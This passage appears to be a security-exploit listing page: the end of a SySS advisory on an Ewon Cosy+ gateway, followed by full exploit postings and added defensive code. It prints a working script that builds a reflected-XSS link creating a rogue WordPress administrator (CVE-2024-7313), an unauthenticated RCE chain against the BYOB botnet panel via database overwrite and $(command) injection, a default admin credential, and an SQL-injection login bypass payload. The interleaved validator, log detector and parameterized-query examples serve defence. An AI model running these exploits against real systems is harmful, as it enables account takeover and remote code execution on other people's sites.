and letting the manufacturer know that<br /> the vulnerability will be published within a talk at DEF CON[7]<br /> in August<br />2024-07-12: Manufacturer responded that the fix is planned by the end of<br /> July; manufacturer asked again for reviewing the blog post<br /> draft<br />2024-07-12: Again confirmed reviewing the blog post is possible and asking<br /> for the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post and confirmed that a<br /> fix is provided<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-018<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-018.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33896<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33896<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br 
/>E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
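The note in the advisory above that "up" and "down" are blocklisted while "--up" passes points at the real defect: the device compared the raw option token against a denylist, although OpenVPN accepts a config-file option with or without leading dashes. The Go validator below is an added example, not HMS firmware code, of the check a device should apply to an uploaded OpenVPN configuration: option names are normalised before comparison, every option that can run an external program is refused, and only an allowlist of harmless options is admitted, inline blocks included; NaiveDenyCheck reproduces the original raw-token comparison for contrast. The allowlist, the UploadedConfig sample and the /tmp/hook.sh path are constructed; the sample mirrors the PoC configuration with a harmless placeholder in place of the payload.

```go
package main

import (
	"fmt"
	"strings"
)

// Options an uploaded client configuration may contain (constructed allowlist
// for the example; a real deployment derives it from what the device needs).
var allowedOptions = map[string]bool{
	"client": true, "dev": true, "proto": true, "remote": true, "nobind": true,
	"persist-tun": true, "persist-key": true, "verb": true, "mute": true,
	"cipher": true, "auth": true, "remote-cert-tls": true, "resolv-retry": true,
	"keepalive": true, "ca": true, "cert": true, "key": true, "tls-auth": true,
}

// Options that make OpenVPN run an external program, or enable doing so.
var scriptOptions = map[string]bool{
	"up": true, "down": true, "route-up": true, "route-pre-down": true, "ipchange": true,
	"tls-verify": true, "auth-user-pass-verify": true, "client-connect": true,
	"client-disconnect": true, "learn-address": true, "plugin": true, "script-security": true,
}

// UploadedConfig mirrors the PoC configuration with a harmless placeholder
// script path in place of the payload (constructed sample).
const UploadedConfig = `client
dev tun
persist-tun
proto tcp
verb 5
mute 20
--up /tmp/hook.sh
script-security 2
`

// NormalizeOption maps "--up", "-up" and "UP" to "up". In a config file OpenVPN
// accepts an option name with or without leading dashes, so a check on the raw
// token misses the dashed spelling, which is the bypass in this advisory.
func NormalizeOption(token string) string {
	return strings.ToLower(strings.TrimLeft(token, "-"))
}

// NaiveDenyCheck models the original device check: the raw first token of each
// line is compared with a small blocklist.
func NaiveDenyCheck(cfg string) []string {
	blocked := map[string]bool{"up": true, "down": true}
	var hits []string
	for n, raw := range strings.Split(cfg, "\n") {
		fields := strings.Fields(raw)
		if len(fields) > 0 && blocked[fields[0]] {
			hits = append(hits, fmt.Sprintf("line %d: %s", n+1, fields[0]))
		}
	}
	return hits
}

// ValidateUploadedConfig normalises option names, refuses anything that can
// execute a program and admits only allowlisted options, inline blocks included.
func ValidateUploadedConfig(cfg string) []string {
	var violations []string
	inlineTag := "" // inside <tag> ... </tag>, e.g. an inline CA certificate
	for n, raw := range strings.Split(cfg, "\n") {
		line := strings.TrimSpace(raw)
		if inlineTag != "" {
			if line == "</"+inlineTag+">" {
				inlineTag = ""
			}
			continue // payload lines of an inline block are data, not options
		}
		if line == "" || line[0] == '#' || line[0] == ';' {
			continue
		}
		if strings.HasPrefix(line, "<") && strings.HasSuffix(line, ">") {
			inlineTag = strings.Trim(line, "<>")
			if !allowedOptions[NormalizeOption(inlineTag)] {
				violations = append(violations, fmt.Sprintf("line %d: inline block %q not allowed", n+1, inlineTag))
			}
			continue
		}
		token := strings.Fields(line)[0]
		opt := NormalizeOption(token)
		switch {
		case scriptOptions[opt]:
			violations = append(violations, fmt.Sprintf("line %d: %q can run external programs", n+1, token))
		case !allowedOptions[opt]:
			violations = append(violations, fmt.Sprintf("line %d: %q is not an allowlisted option", n+1, token))
		}
	}
	return violations
}
```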
<pre><code># Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation<br /># Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK)<br /># Date: 16/08/2024<br /># Exploit Author: Tim Lepp<br /># Vendor Homepage: https://getshieldsecurity.com/<br /># Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5)<br /># Version: <20.0.6<br /># Tested on: Ubuntu<br /># CVE : CVE-2024-7313<br /><br />How It Works<br /><br /> * The script first checks whether the target WordPress installation runs a vulnerable version of the Shield Security plugin by parsing the plugin version string out of the wp-login.php response.<br /> * If the version is vulnerable, it generates a reflected XSS payload that, when executed in an administrator's browser, creates a new administrator user with a hardcoded strong password (WordPress won't accept a weak password without user intervention).<br /> * The payload first issues a GET request to /wp-admin/user-new.php to read the WordPress nonce used for account creation, then uses that nonce in a POST request to the same endpoint carrying the details of the new user supplied to the script.<br /> * The payload is then URL-encoded into the nav_sub parameter of the Shield Security dashboard URL and displayed for use in the attack.<br /> * Once the link is sent to an administrator of the site and clicked, a new Administrator user is created on the site with the details supplied to the script.<br />
This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background.<br /><br />Reference<br />https://research.cleantalk.org/cve-2024-7313/<br /><br /><br />Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main<br /><br /><br />--- code ---<br /><br />import sys<br />import urllib.parse<br />import requests<br />from bs4 import BeautifulSoup<br /><br /># Color codes for terminal output<br />red = '\033[91m'<br />green = '\033[92m'<br />yellow = '\033[93m'<br />blue = '\033[96m'<br />purple = '\033[95m'<br />reset = '\033[0m'<br /><br /># Banner and vulnerability information - Displayed at the start of the script<br />def print_banner():<br /> print(f"""{red}<br />#############################################################################<br /># #<br /># #<br /># ______ _______ ____ ___ ____ _ _ _____ _____ _ _____ #<br /># / ___\ \ / | ____| |___ \ / _ |___ \| || | |___ |___ // |___ / #<br /># | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ / / |_ \| | |_ \ #<br /># | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ / ___) | |___) | #<br /># \____| \_/ |_____| |_____|\___|_____| |_| /_/ |____/|_|____/ #<br /># #<br /># Shield Security Plugin Vulnerability (CVE-2024-7313) #<br /># Reflected XSS in WordPress Shield Security Plugin #<br /># Versions Affected: < 20.0.6 #<br /># Risk: High #<br /># Discovered by: Wayne-Kerr #<br /># Published: August 7, 2024 #<br />############################################################################# <br /> {reset}""")<br /><br /># Help menu - Provides instructions when '-h' or '--help' is used<br />def print_help():<br /> print(f"""{yellow}<br />Usage: python3 exploit.py <target_url><br /><br />Example:<br /> python3 exploit.py http://example.com<br /><br />Options:<br /> -h, --help Show this help message and exit<br />{reset}""")<br /><br /># Format the target URL - Ensures the URL starts with "http://" or 
"https://"<br />def format_target_url(target_url):<br /> if target_url.startswith("http://") or target_url.startswith("https://"):<br /> return target_url<br /> else:<br /> return f"http://{target_url}"<br /><br /># Check if the target is vulnerable by accessing the wp-login.php page<br />def check_vulnerability(target_url):<br /> try:<br /> response = requests.get(f"{target_url}/wp-login.php")<br /> if response.status_code == 200:<br /> # Try to extract version information from the response<br /> version_info = response.text.split("ver=")[-1].split("\"")[0]<br /> version = version_info.split(".")<br /> major_version = int(version[0])<br /> minor_version = int(version[1])<br /> patch_version = int(version[2].split('&')[0])<br /><br /> # Check if the version is below 20.0.6<br /> if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6):<br /> print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}")<br /> return True<br /> else:<br /> print(f"{yellow}Version not vulnerable.{reset}")<br /> return False<br /> else:<br /> print(f"{red}Failed to retrieve the version information.{reset}")<br /> return False<br /> except Exception as e:<br /> print(f"{red}Error occurred while checking vulnerability: {e}{reset}")<br /> return False<br /><br /># Generate the XSS payload URL that exploits the vulnerability<br />def generate_xss_payload(target_url, username, email, first_name, last_name):<br /> # Hardcoded password for the new admin account to be created<br /> hardcoded_password = "HaxorStrongAFPassword123!!"<br /><br /> # The payload template for the XSS attack<br /> payload_template = (<br /> "var xhrNonce = new XMLHttpRequest(); "<br /> "xhrNonce.open('GET', '/wp-admin/user-new.php', true); "<br /> "xhrNonce.onload = function() {{ "<br /> "if (xhrNonce.status === 200) {{ "<br /> "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; "<br /> "var xhr = new 
XMLHttpRequest(); "<br /> "xhr.open('POST', '/wp-admin/user-new.php', true); "<br /> "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); "<br /> # Referer and Origin are forbidden request headers: the browser silently ignores these two<br /> # calls and sends its own same-origin values, so they are harmless but have no effect.<br /> "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); "<br /> "xhr.setRequestHeader('Origin', '{target}'); "<br /> "var params = 'action=createuser&_wpnonce_create-user=' + nonce + "<br /> "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php"<br /> "&user_login={username}&email={email}"<br /> "&first_name={first_name}&last_name={last_name}&url=test"<br /> "&pass1={password}&pass2={password}&role=administrator"<br /> "&createuser=Add+New+User'; "<br /> "xhr.send(params); "<br /> # onload is attached after send(); the request is asynchronous, so the handler is in place before the response arrives.<br /> "xhr.onload = function() {{ "<br /> "if (xhr.status == 200) {{ "<br /> "console.log('Admin user created successfully'); "<br /> "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; "<br /> "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} "<br /> "}}; "<br /> "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; "<br /> "xhrNonce.send();"<br /> )<br /><br /> # Fill the template. Every value lands in an application/x-www-form-urlencoded body,<br /> # so each one is percent-encoded: a space or '&' in a name would otherwise break the request.<br /> payload = payload_template.format(<br /> target=target_url,<br /> username=urllib.parse.quote(username),<br /> email=urllib.parse.quote(email),<br /> first_name=urllib.parse.quote(first_name),<br /> last_name=urllib.parse.quote(last_name),<br /> password=urllib.parse.quote(hardcoded_password)<br /> )<br /><br /> # URL encode the payload and generate the full URL for the XSS attack<br /> encoded_payload = urllib.parse.quote(f"<script>{payload}</script>")<br /> full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}"<br /><br /> return full_url<br /><br />if __name__ == "__main__":<br /> try:<br /> # Print the banner<br /> print_banner()<br /><br /> # Check for help menu flag and print help if necessary<br /> if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:<br /> print_help()<br /> sys.exit(0)<br /><br /> # Get the 
target URL from the command-line argument<br /> raw_target_url = sys.argv[1]<br /> target_url = format_target_url(raw_target_url)<br /><br /> # Check if the target is vulnerable<br /> if not check_vulnerability(target_url):<br /> sys.exit(1)<br /><br /> # Get user input for the new admin account details<br /> username = input(f"{blue}Enter username: {reset}")<br /> email = input(f"{blue}Enter email: {reset}")<br /> first_name = input(f"{blue}Enter first name: {reset}")<br /> last_name = input(f"{blue}Enter last name: {reset}")<br /><br /> # Display the hardcoded password<br /> hardcoded_password = "HaxorStrongAFPassword123!!"<br /> print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}")<br /><br /> # Generate and display the XSS payload URL<br /> xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name)<br /> print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}")<br /><br /> # Handle keyboard interruption<br /> except KeyboardInterrupt:<br /> print(f"\n{red}Script interrupted by user.{reset}")<br /> sys.exit(1)<br /> # Catch any other exceptions and display an error message<br /> except Exception as e:<br /> print(f"{red}An error occurred: {e}{reset}")<br /> sys.exit(1)<br /></code></pre>
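The chain described under "How It Works" leaves two marks in the web server's access log: a request for the Shield Security dashboard whose reflected nav_sub parameter carries markup, and, from the same client a moment later (the script runs in the victim administrator's browser), a POST to /wp-admin/user-new.php. The detector below is an added example for this page, not part of the original exploit. It runs over constructed combined-format log lines; the log format and the ten-minute follow-up window are assumptions.

```python
"""Flag CVE-2024-7313 exploitation attempts in web server access logs.

Added example for this page, not part of the original exploit. It looks for
the two observable steps of the chain above: a Shield Security dashboard URL
whose reflected nav_sub parameter carries markup, followed by a POST to
/wp-admin/user-new.php from the same client (the XSS runs in the victim's
browser, so both requests come from the victim's address). The log lines are
constructed; the combined-log format and the 10-minute window are assumptions.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Tags, javascript: URLs and inline event handlers; checked on the decoded value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)
FOLLOWUP_WINDOW = timedelta(minutes=10)  # assumption: max gap between XSS hit and user creation

# Constructed sample log (combined format). 203.0.113.7 is the phished admin.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Aug/2024:10:00:01 +0000] "GET /wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Aug/2024:10:00:05 +0000] "GET /wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20x%3Dnew%20XMLHttpRequest%28%29%3B%3C%2Fscript%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Aug/2024:10:00:06 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 9000',
    '203.0.113.7 - - [16/Aug/2024:10:00:07 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0',
    '198.51.100.9 - - [16/Aug/2024:10:30:00 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0',
]


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, url, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def suspicious_nav_sub(url):
    """Return the decoded nav_sub value if it contains HTML/JS, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("page") != ["icwp-wpsf-plugin"]:
        return None
    for value in qs.get("nav_sub", []):
        decoded = unquote(value)  # parse_qs decoded once; this also catches double-encoded payloads
        if MARKUP_RE.search(decoded):
            return decoded
    return None


def scan(lines):
    """Return findings as (kind, ip, detail) tuples in log order."""
    findings = []
    last_hit = {}  # ip -> time of the most recent reflected-XSS request
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = suspicious_nav_sub(rec["url"])
        if decoded is not None:
            last_hit[rec["ip"]] = rec["ts"]
            findings.append(("xss_attempt", rec["ip"], decoded))
            continue
        if (rec["method"] == "POST"
                and urlsplit(rec["url"]).path.endswith("/wp-admin/user-new.php")
                and rec["ip"] in last_hit
                and rec["ts"] - last_hit[rec["ip"]] <= FOLLOWUP_WINDOW):
            findings.append(("admin_creation_after_xss", rec["ip"], rec["ts"].isoformat()))
    return findings


if __name__ == "__main__":
    for kind, ip, detail in scan(SAMPLE_LOG):
        print(f"{kind:26} {ip:15} {detail}")
```

The legitimate dashboard request (nav_sub=overview) and the unrelated POST from 198.51.100.9 are not flagged; only the markup-bearing URL and the user-new.php POST that follows it from the same address are reported. Feeding real logs through `scan()` means reading them line by line instead of `SAMPLE_LOG`.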
<pre><code># Exploit Title: BYOB (Build Your Own Botnet) v2.0.0 Unauthenticated RCE (Remote Code Execution)<br /># Date: 2024-08-14<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/malwaredllc/byob<br /># Version: v2.0.0<br /># Tested on: Ubuntu 22.04 LTS, Python 3.10.12, change numpy==1.17.3->numpy<br /># CVE: CVE-2024-?????, CVE-2024-?????<br /># Description: This exploit works by spoofing an agent callback to overwrite the sqlite database and bypass authentication, then exploiting an authenticated command injection in the payload builder page<br /># Github: <br /># Blog: <br />import sys<br />import json<br />import base64<br />import string<br />import random<br />import argparse<br />import requests<br /><br />from bs4 import BeautifulSoup<br /><br /><br />def get_csrf(session, url):<br /> r = session.get(url)<br /> soup = BeautifulSoup(r.text, 'html.parser')<br /> csrf_token = soup.find('input', {'name': 'csrf_token'})['value']<br /> return csrf_token<br /><br /><br />def upload_database(session, url, filename):<br /> with open('database.db', 'rb') as f:<br /> bindata = f.read()<br /> data = base64.b64encode(bindata).decode('ascii')<br /> json_data = {'data': data, 'filename': filename, 'type': "txt", 'owner': "admin", "module": "icloud", "session": "lol"}<br /> headers = {<br /> 'Content-Length': str(len(json.dumps(json_data)))<br /> }<br /> print("[***] Uploading database")<br /> upload_response = session.post(f"{url}/api/file/add", data=json_data, headers=headers)<br /> print(upload_response.status_code)<br /> return upload_response.status_code<br /><br /><br />def exploit(url, username, password, user_agent, command):<br /> s = requests.Session()<br /> # This is to ensure reliability, as the application cwd might change depending on the stage of the docker run process<br /> filepaths = ["/proc/self/cwd/buildyourownbotnet/database.db", "/proc/self/cwd/../buildyourownbotnet/database.db", 
"/proc/self/cwd/../../../../buildyourownbotnet/database.db", "/proc/self/cwd/instance/database.db", "/proc/self/cwd/../../../../instance/database.db", "/proc/self/cwd/../instance/database.db"]<br /> # A 500 means the server could not write the database to that path; try the next candidate<br /> failed = True<br /> for filepath in filepaths:<br /> if upload_database(s, url, filepath) != 500:<br /> failed = False<br /> break<br /> if failed:<br /> print("[!!!] Failed to upload database, exiting")<br /> sys.exit(1)<br /><br /> if password is None:<br /> password = ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(32)])<br /> print(username + ":" + password)<br /><br /> register_csrf = get_csrf(s, f'{url}/register')<br /> headers = {<br /> 'User-Agent': user_agent,<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> }<br /> data = {<br /> 'csrf_token': register_csrf,<br /> 'username': username,<br /> 'password': password,<br /> 'confirm_password': password,<br /> 'submit': 'Sign Up'<br /> }<br /> print("[***] Registering user ")<br /> register_response = s.post(f'{url}/register', headers=headers, data=data)<br /> print(register_response.status_code)<br /><br /> login_csrf = get_csrf(s, f'{url}/login')<br /> data = {<br /> 'csrf_token': login_csrf,<br /> 'username': username,<br /> 'password': password,<br /> 'submit': 'Log In'<br /> }<br /> print("[***] Logging in")<br /> login_response = s.post(f'{url}/login', headers=headers, data=data)<br /> print(login_response.status_code)<br /><br /> headers = {<br /> 'User-Agent': user_agent,<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> }<br /> # The command is injected through $(...) in the operating_system field of the payload builder.<br /> # The build call blocks, so a tiny timeout returns immediately once the request has been sent.<br /> data = f'format=exe&operating_system=nix$({command})&architecture=amd64'<br /> try:<br /> s.post(f'{url}/api/payload/generate', headers=headers, data=data, stream=True, timeout=0.0000000000001)<br /> except requests.exceptions.ReadTimeout:<br /> pass<br /><br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("-t", "--target", help="The target URL of the BYOB admin panel", required=True)<br 
/>parser.add_argument("-u", "--username", help="The username to set for the new admin account", default='admin')<br />parser.add_argument("-p", "--password", help="The password to set for the new admin account", default=None)<br />parser.add_argument("-A", "--user-agent", help="The user-agent to use for requests", default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36')<br />parser.add_argument("-c", "--command", help="The command to execute on the BYOB server", required=True)<br /><br />args = parser.parse_args()<br /><br />exploit(args.target.rstrip("/"), args.username, args.password, args.user_agent, args.command)<br /></code></pre>
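The exploit above chains two weaknesses: a file-add endpoint that uses the client-supplied filename as a filesystem path (hence the /proc/self/cwd/... candidates that land the attacker's database.db over the real one), and a payload builder that drops the operating_system field into a shell command, so nix$(cmd) runs cmd. The checks below are an added example, not BYOB's own code; the upload root, the allowlists and the build command are illustrative assumptions. Nothing is executed: each function returns the path or argv a handler would go on to use, so the unsafe and safe variants can be compared directly.

```python
"""Input checks for the two weaknesses chained by the BYOB exploit above.

Added example, not BYOB's own code: the handler names, the upload root and
the build command are illustrative assumptions. Nothing is executed here;
the functions return the path or argv a handler would go on to use, so the
unsafe and safe variants can be compared side by side.
"""
import os
import shlex
from pathlib import PurePosixPath

UPLOAD_ROOT = PurePosixPath("/srv/byob/uploads")   # assumption: where /api/file/add writes
ALLOWED_OS = {"nix", "windows", "mac"}             # assumption: builder targets
ALLOWED_FORMAT = {"py", "exe", "app"}
ALLOWED_ARCH = {"amd64", "x86"}


def resolve_upload_path(filename, root=UPLOAD_ROOT):
    """Pin an uploaded file under ``root``.

    The exploit sends filename=/proc/self/cwd/.../database.db and the server
    writes there. Accepting only a bare file name (no directory part, no '.'
    or '..', no NUL) turns every such value into a hard error before any write.
    """
    if not filename or "\x00" in filename:
        raise ValueError("empty or NUL-bearing filename")
    if filename in (".", "..") or filename != os.path.basename(filename):
        raise ValueError(f"filename must be a bare name, got {filename!r}")
    return str(root / filename)


def vulnerable_build_command(operating_system, fmt, arch):
    """The pattern the exploit abuses: request fields pasted into a shell string.

    With operating_system='nix$(id)' the shell expands $(id) before the build
    tool ever sees its arguments. Returned for inspection, never run here.
    """
    return f"python3 build.py --os {operating_system} --format {fmt} --arch {arch}"


def safe_build_argv(operating_system, fmt, arch):
    """Allowlist each field, then return argv as a list for subprocess without a shell."""
    if operating_system not in ALLOWED_OS:
        raise ValueError(f"unsupported operating_system {operating_system!r}")
    if fmt not in ALLOWED_FORMAT:
        raise ValueError(f"unsupported format {fmt!r}")
    if arch not in ALLOWED_ARCH:
        raise ValueError(f"unsupported architecture {arch!r}")
    return ["python3", "build.py", "--os", operating_system, "--format", fmt, "--arch", arch]


def shell_quoted(argv):
    """If a shell string is unavoidable, quote each element; $(id) then stays literal."""
    return " ".join(shlex.quote(a) for a in argv)


def rejects_upload(filename):
    """True if resolve_upload_path refuses the name."""
    try:
        resolve_upload_path(filename)
    except ValueError:
        return True
    return False


def rejects_build(operating_system, fmt="exe", arch="amd64"):
    """True if safe_build_argv refuses the field set."""
    try:
        safe_build_argv(operating_system, fmt, arch)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name in ["database.db", "/proc/self/cwd/instance/database.db", "../instance/database.db"]:
        print(f"{name!r:45} rejected={rejects_upload(name)}")
    print(vulnerable_build_command("nix$(id)", "exe", "amd64"))
    print(shell_quoted(["python3", "build.py", "--os", "nix$(id)"]))
    print(f"nix$(id) rejected={rejects_build('nix$(id)')}")
```

The allowlist is the primary control: the builder only ever has a handful of legitimate targets, so anything outside the set is rejected before a process is spawned. `shell_quoted` is the fallback for code paths that genuinely need a shell string, and the bare-name rule on uploads removes the whole class of path tricks rather than trying to enumerate them.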
<pre><code>====================================================================================================================================<br />| # Title : Insurance 1.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://demo.phpscriptpoint.com/insurance/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 1234<br /><br />[+] https://www/127.0.0.1/demo/phpscriptpointcom/insurance/admin<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Hotel Management System 1.0 auth bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload in both the user and pass fields : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/hotel/admin/index.php?page=home<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
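The payload ' or 0=0 ## works because the login form's values are pasted straight into the SQL string: the quote closes the literal, or 0=0 makes the WHERE clause true for every row, and the MySQL # comment discards the rest of the statement, so the first user (the administrator) comes back. The snippet below is an added example, not the Hotel Management System's code: it rebuilds that login check against an in-memory sqlite database with constructed rows and puts the parameterized version beside it. sqlite does not accept MySQL's # comment, so the demo payload ends in -- , which plays the same role.

```python
"""Why the payload  ' or 0=0 ##  logs in: string-built SQL versus parameters.

Added example, not the Hotel Management System's code. It rebuilds the login
check against an in-memory sqlite database with constructed rows. sqlite does
not understand MySQL's '#' comment, so the demo payload ends with '-- ', which
plays the same role: it comments out the rest of the WHERE clause.
"""
import sqlite3

PAYLOAD = "' or 0=0 -- "   # sqlite form of the page's  ' or 0=0 ##


def make_db():
    """Constructed sample users table; plaintext passwords only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "S3cret!"), ("reception", "frontdesk")])
    return conn


def rendered_vulnerable_sql(username, password):
    """The statement the vulnerable login sends: input pasted into the query text.

    With both fields set to PAYLOAD it reads
        ... WHERE username = '' or 0=0 -- ' AND password = '' or 0=0 -- '
    so every row matches and the first one (admin) is returned.
    """
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(conn, username, password):
    """Login as typically written in the vulnerable app."""
    row = conn.execute(rendered_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same check with bound parameters: the quote and the comment are just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(rendered_vulnerable_sql(PAYLOAD, PAYLOAD))
    print("vulnerable    :", login_vulnerable(db, PAYLOAD, PAYLOAD))      # admin
    print("parameterized :", login_parameterized(db, PAYLOAD, PAYLOAD))  # None
```

Bound parameters are the whole fix for the injection; a real login should additionally compare a password hash rather than the stored plaintext used here for brevity.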